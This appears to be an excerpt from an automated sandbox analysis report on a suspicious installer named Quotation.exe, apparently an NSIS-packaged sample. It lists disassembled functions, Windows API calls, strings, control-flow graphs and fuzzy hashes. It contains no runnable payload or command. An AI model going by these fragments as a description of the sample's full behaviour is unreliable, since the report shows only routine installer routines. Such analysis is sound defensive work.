                                                                  • Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                • lstrcatW.KERNEL32(1033,Litteraturhistoriens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Litteraturhistoriens Setup: Installing,00000000,00000002,00000000,75923420,00000000,75923170), ref: 00405A9F
                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Litteraturhistoriens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Litteraturhistoriens Setup: Installing,00000000,00000002,00000000), ref: 00405B23
                                                                • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Litteraturhistoriens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Litteraturhistoriens Setup: Installing,00000000), ref: 00405B38
                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00405B43
                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\overlays\besvangredes), ref: 00405B8C
                                                                  • Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A
                                                                • RegisterClassW.USER32(007A74E0), ref: 00405BD1
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405C4F
                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
                                                                • GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
                                                                • RegisterClassW.USER32(007A74E0), ref: 00405C94
                                                                • DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\overlays\besvangredes$Call$Control Panel\Desktop\ResourceLocale$Litteraturhistoriens Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
                                                                • API String ID: 1975747703-3921747116
                                                                • Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                • Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
                                                                • Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                • Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 329 40154a-4015bd 330 402ea1 329->330 331 4015c3-4015c7 329->331 351 402ea5 330->351 332 4016c1-4016cf 331->332 333 4017c2-401e9e call 40303e call 4065ad 331->333 334 401684-4016aa 331->334 335 4015e6-4015ee 331->335 336 4018cb-4018d4 call 40303e call 406a34 331->336 337 40160c-40160d 331->337 338 4015ce-4015d0 331->338 339 4016ef-4016fb call 40303e SetFileAttributesW 331->339 340 4016af-4016bc call 4065fd 331->340 341 40182f-40184b call 40303e GetFullPathNameW 331->341 342 401711-401728 call 40303e call 406ba3 331->342 343 401633-40163a SetForegroundWindow 331->343 344 4017d3-4017f6 call 40303e * 3 MoveFileW 331->344 345 4015d5-4015d6 331->345 346 401618-40162e call 403002 Sleep 331->346 347 4015f9-401607 call 4030fd call 401399 331->347 348 40189b-4018b8 call 40303e SearchPathW 331->348 349 4018de-401904 call 40303e call 406de1 331->349 350 40163f-401645 331->350 352 4016d1-4016d5 ShowWindow 332->352 353 4016d9-4016e0 332->353 425 401bb2-401bb6 333->425 426 401ea4-401ea8 333->426 354 402ead-402eb7 334->354 357 4015f0-4015f7 PostQuitMessage 335->357 358 4015dc-4015e1 335->358 408 4018d9 336->408 363 40160e-401613 call 405d18 337->363 338->354 389 401701-401703 339->389 340->330 399 401857-40185d 341->399 400 40184d-401855 341->400 415 401784-40178e 342->415 416 40172a-40173f call 4065d4 342->416 343->330 432 401804-401808 344->432 433 4017f8-4017ff 344->433 355 4015d7 call 405d18 345->355 346->330 347->354 348->330 393 4018be-4018c6 348->393 418 401906-40190c call 406af8 349->418 419 40190e-401920 call 406af8 call 406534 lstrcatW 349->419 368 401671-40167f 350->368 369 401647 350->369 370 402eab 351->370 352->353 353->330 373 4016e6-4016ea ShowWindow 353->373 355->358 357->358 358->354 363->330 368->330 385 401657-40166c call 403002 369->385 386 401649-401650 369->386 370->354 373->330 385->330 386->385 389->330 403 401709-40170c 389->403 393->351 401 40187b 399->401 402 40185f-401862 399->402 411 40187f-401883 400->411 401->411 402->401 412 401864-40186c call 4065ad 402->412 403->351 408->389 411->351 413 401889-401896 GetShortPathNameW 411->413 412->400 437 40186e-401876 call 406af8 412->437 413->351 420 401790-4017ab call 405d18 call 406af8 SetCurrentDirectoryW 415->420 421 4017bb-4017bd 415->421 438 401741-401745 416->438 439 401758-401759 call 405dfc 416->439 441 401925-40192d call 406d1b 418->441 419->441 420->330 456 4017b1-4017b6 420->456 421->363 425->354 426->354 432->403 440 40180e-401816 call 4065ad 432->440 433->363 437->401 438->439 446 401747-40174e call 4064da 438->446 454 40175e-401760 439->454 440->403 458 40181c-40182a call 40621b 440->458 455 40192e-401931 441->455 446->439 463 401750-401751 call 405e1c 446->463 459 401762-401767 454->459 460 401775-40177e 454->460 461 401933-40193d call 4065ad 455->461 462 401964-401966 455->462 456->330 458->363 465 401774 459->465 466 401769-401772 GetFileAttributesW 459->466 460->416 467 401780 460->467 477 401950-401960 461->477 478 40193f-40194e CompareFileTime 461->478 469 401968-401969 call 406b7b 462->469 470 40196e-401989 call 4068f9 462->470 476 401756 463->476 465->460 466->460 466->465 467->415 469->470 480 401a18-401a49 call 405d18 call 403148 470->480 481 40198f-401991 470->481 476->454 477->462 478->477 493 401a52-401a5a SetFileTime 480->493 494 401a4b-401a50 480->494 483 401993-4019df call 406af8 * 2 call 405e98 call 406af8 call 406a86 481->483 484 4019fd-401a13 call 405d18 481->484 483->455 512 4019e5-4019e8 483->512 484->351 496 401a60-401a6d CloseHandle 493->496 494->493 494->496 496->330 498 401a73-401a76 496->498 500 401a78-401a87 call 405e98 lstrcatW 498->500 501 401a89-401a8c call 405e98 498->501 507 401a91-401a9c call 406a86 500->507 501->507 507->358 513 4019f2-4019f8 512->513 514 4019ea-4019ed 512->514 513->370 514->355
                                                                APIs
                                                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                                                • SetForegroundWindow.USER32 ref: 00401634
                                                                • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                                                • SetCurrentDirectoryW.KERNELBASE(00000000,007B4000,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,007B4000,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                                                • SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
                                                                • CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
                                                                • lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                • String ID: C:\Users\user\AppData\Local\Temp\nss46CE.tmp$C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll$Call
                                                                • API String ID: 3895412863-3541277449
                                                                • Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                • Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
                                                                • Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                • Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 515 4033cb-403418 GetTickCount GetModuleFileNameW call 4068f9 518 403424-403454 call 406af8 call 406cee call 406af8 GetFileSize 515->518 519 40341a-40341f 515->519 527 403550-40355f call 403367 518->527 528 40345a 518->528 520 403623-40362a 519->520 534 403565-403567 527->534 535 40361e 527->535 530 40345e-403484 call 40311b 528->530 536 403616-40361d call 403367 530->536 537 40348a-403491 530->537 538 403598-4035c8 GlobalAlloc call 403131 call 403148 534->538 539 403569-403581 call 403131 call 406926 534->539 535->520 536->535 540 403512-403515 537->540 541 403493-4034ac call 406692 537->541 538->535 566 4035ca-4035dc 538->566 562 403586-403588 539->562 548 403517-40351e call 403367 540->548 549 40351f-403525 540->549 541->549 559 4034ae-4034b6 541->559 548->549 551 403527-403536 call 406e1a 549->551 552 40353a-403542 549->552 551->552 552->530 561 403548-40354c 552->561 559->549 565 4034b8-4034c0 559->565 561->527 562->535 563 40358e-403592 562->563 563->535 563->538 565->549 567 4034c2-4034ca 565->567 568 4035e4-4035e7 566->568 569 4035de 566->569 567->549 570 4034cc-4034d4 567->570 571 4035ea-4035f2 568->571 569->568 570->549 572 4034d6-4034f5 570->572 571->571 573 4035f4-40360d SetFilePointer call 406692 571->573 572->535 574 4034fb-403501 572->574 577 403612-403614 573->577 574->561 576 403503-40350c 574->576 576->549 578 40350e-403510 576->578 577->520 578->549
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 004033DE
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA
                                                                  • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                  • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00403444
                                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E
                                                                Strings
                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361E
                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033D1
                                                                • soft, xrefs: 004034C2
                                                                • Null, xrefs: 004034CC
                                                                • Inst, xrefs: 004034B8
                                                                • Error launching installer, xrefs: 0040341A
                                                                • C:\Users\user\Desktop\Quotation.exe, xrefs: 004033E9, 004033F3, 00403407, 00403424
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                • String ID: C:\Users\user\Desktop\Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                • API String ID: 2803837635-1275277848
                                                                • Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                • Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
                                                                • Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                • Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 579 405e98-405ea1 580 405ea3-405eb2 579->580 581 405eb4-405ecf 579->581 580->581 582 405ed1-405edc 581->582 583 405ee6-405eed 581->583 582->583 584 405ede-405ee2 582->584 585 4060e1-4060e8 583->585 586 405ef3-405ef6 583->586 584->583 588 4060f3 585->588 589 4060ea-4060f1 call 406af8 585->589 587 405ef7-405f05 586->587 590 405f0b-405f16 587->590 591 4060dc-4060e0 587->591 593 4060f5-4060fb 588->593 589->593 594 4060b5 590->594 595 405f1c-405f60 590->595 591->585 597 4060c3 594->597 598 4060b7-4060c1 594->598 599 406060-406063 595->599 600 405f66-405f77 595->600 601 4060c6 597->601 598->601 602 406065-406068 599->602 603 406099-40609c 599->603 604 405fb7-405fba 600->604 605 405f79-405f97 call 406955 600->605 608 4060c8-4060d6 601->608 606 406078-40608f call 406af8 602->606 607 40606a-406076 call 4065fd 602->607 610 4060a7-4060b3 lstrlenW 603->610 611 40609e-4060a2 call 405e98 603->611 612 405fca-405fcd 604->612 613 405fbc-405fc8 GetSystemDirectoryW 604->613 619 405f9c-405fa5 605->619 606->610 629 406091-406097 call 406d1b 606->629 607->610 608->587 608->591 610->608 611->610 615 405fdd-405fe5 612->615 616 405fcf-405fdb GetWindowsDirectoryW 612->616 614 406038 613->614 625 40603c-406041 614->625 621 405fe7-405ff0 615->621 622 405ffc-406012 SHGetSpecialFolderLocation 615->622 616->614 619->625 626 405fab-405fb2 call 405e98 619->626 633 405ff8-405ffa 621->633 627 406014-40602d SHGetPathFromIDListW CoTaskMemFree 622->627 628 40602f-406036 622->628 630 406043-406046 625->630 631 406054-40605e call 406d1b 625->631 626->625 627->614 627->628 628->614 628->615 629->610 630->631 635 406048-40604e lstrcatW 630->635 631->610 633->614 633->622 635->631
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2
                                                                  • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406D90
                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406DA4
                                                                  • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406DBC
                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,?,?), ref: 00405FD5
                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,?,?), ref: 0040604E
                                                                • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,?,?), ref: 004060A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 4187626192-1094107421
                                                                • Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                • Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
                                                                • Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                • Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 930 405d18-405d24 931 405df5-405df9 930->931 932 405d2a-405d3d 930->932 933 405d49-405d59 lstrlenW 932->933 934 405d3f-405d44 call 405e98 932->934 936 405d5b-405d6a lstrlenW 933->936 937 405d7e 933->937 934->933 938 405d70-405d7c lstrcatW 936->938 939 405df2-405df4 936->939 940 405d83-405d86 937->940 938->940 939->931 941 405d95-405d98 940->941 942 405d88-405d8f SetWindowTextW 940->942 943 405de0-405de2 941->943 944 405d9a-405dde SendMessageW * 3 941->944 942->941 943->939 945 405de4-405dea 943->945 944->943 945->939
                                                                APIs
                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
                                                                • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,00000000,?,?), ref: 00405D77
                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll), ref: 00405D8F
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE
                                                                  • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll,?,?,?), ref: 0040604E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll
                                                                • API String ID: 1759915248-3362446269
                                                                • Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                • Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
                                                                • Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                • Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
